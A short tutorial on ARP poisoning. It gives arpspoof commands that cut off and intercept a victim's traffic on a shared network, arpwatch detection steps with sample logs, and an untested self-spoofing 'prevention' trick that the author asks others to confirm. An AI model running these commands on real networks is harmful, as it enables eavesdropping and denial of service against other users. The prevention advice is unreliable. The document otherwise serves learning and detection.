idea – detection – solution
what is arp
From wikipedia
In computer networking, the Address Resolution Protocol (ARP) is the method for finding a host’s hardware address when only its Network Layer address is known. ARP is defined in RFC 826.[1] It is a current Internet Standard (STD 37).
ARP is not an IP-only or Ethernet-only protocol; it can be used to resolve many different network-layer protocol addresses to hardware addresses, although, due to the overwhelming prevalence of IPv4 and Ethernet, ARP is primarily used to translate IP addresses to Ethernet MAC addresses.
Net Cut is tool used here in egypt to dominate the network in shared network
Anatomy of an ARP Poisoning Attack
http://www.watchguard.com/infocenter…ial/135324.asp
how to do
install dsniff and arpwatch packages
example
192.168.1.1 = Router IP
192.168.1.2 = Victim IP
echo 0 > /proc/sys/net/ipv4/ip_forwardarpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
# terminatekillall arpspoof
detection
use arpwatch and watch /var/log/message //here under RedHat
arpwatch -i eth0
cat /var/log/message
#will show somthing like that
Oct 6 21:42:22 localhost arpwatch: changed ethernet address 192.168.1.1 MAC (MAC_adress)
Oct 6 21:42:26 localhost arpwatch: reused old ethernet address 192.168.1.1 MAC_Adress (MAC_Adress)
prevention–just for blockage of incoming data
just use arpspoof command to your ip/echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 Your_IP
about prevention step
i just tried it in My pc … plz any one who could confirm … will be welcome
References
http://www.watchguard.com/infocenter/editorial/135324.asp
http://www.irongeek.com/i.php?page=security/arpspoof
http://en.wikipedia.org/wiki/Address_Resolution_Protocol
http://www.cyberciti.biz/faq/how-to-detect-arp-spoofing-under-unix-or-linux/
http://www.cat-hackers.com/
http://monkey.org/%7Edugsong/dsniff/faq.html
man arp
man arpwatch
man arpspoof